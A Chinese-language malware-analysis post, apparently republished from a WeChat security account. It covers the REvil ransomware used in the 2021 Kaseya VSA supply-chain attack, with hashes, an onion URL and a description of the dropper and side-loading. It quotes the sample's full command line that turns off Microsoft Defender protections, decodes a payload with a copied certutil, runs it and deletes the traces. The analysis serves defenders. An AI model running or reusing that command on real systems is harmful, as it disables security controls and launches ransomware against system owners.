点击上方蓝字关注我们REvil勒索软件团伙在其暗网数据泄漏站点上发布了一条消息,声称他们已于2021年7月2日入侵了MSP提供商Kaseya,并表明已有100万个系统受到勒索软件的影响。该团伙要求Kaseya支付7000万美元的BTC,以为所有受害者公开发布解密器。
样本分析
研究人员近期发现REvil勒索软件样本的哈希值为D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E。
该勒索软件主要由一个释放器,以及VC编译的、包含“SOFTIS”和“MODLIS”恶意资源的二进制文件组成。如下图所示,该样本在运行时会加载资源,资源文件是REvil有效载荷“mpsvc.dll”和“MsMpEng.exe”加载器(loader)。
Dropper
执行时,释放器会在以下系统目录中创建REvil有效载荷和loader文件。
-
C:Windowsmpsvc.dll(在合法的Microsoft Defender中侧加载)
-
C:WindowsMsMpEng.exe(合法loader文件)
下图显示了释放到受害者机器上的有效载荷,及其执行过程。
有效载荷
成功安装后,REvil有效载荷会立即加密所有文档文件。
进程浏览器
最后,勒索软件会锁定受害者的屏幕,并附上勒索说明。此外,REvil还会试图执行PowerShell 命令,以禁用Microsoft Defender服务:
C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe研究人员发现每个系统都使用不同的扩展名进行加密,这表明勒索软件可能是通过系统信息随机生成扩展名的。
勒索说明文件中包含一个链接,其只能通过文件中的密钥访问。该链接属于REvil勒索软件团伙,其中包含与赎金金额、解密器和计时器相关的信息。
IOC
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1
hxxp[:]//aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion
END
本文始发于微信公众号(SecTr安全团队):REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论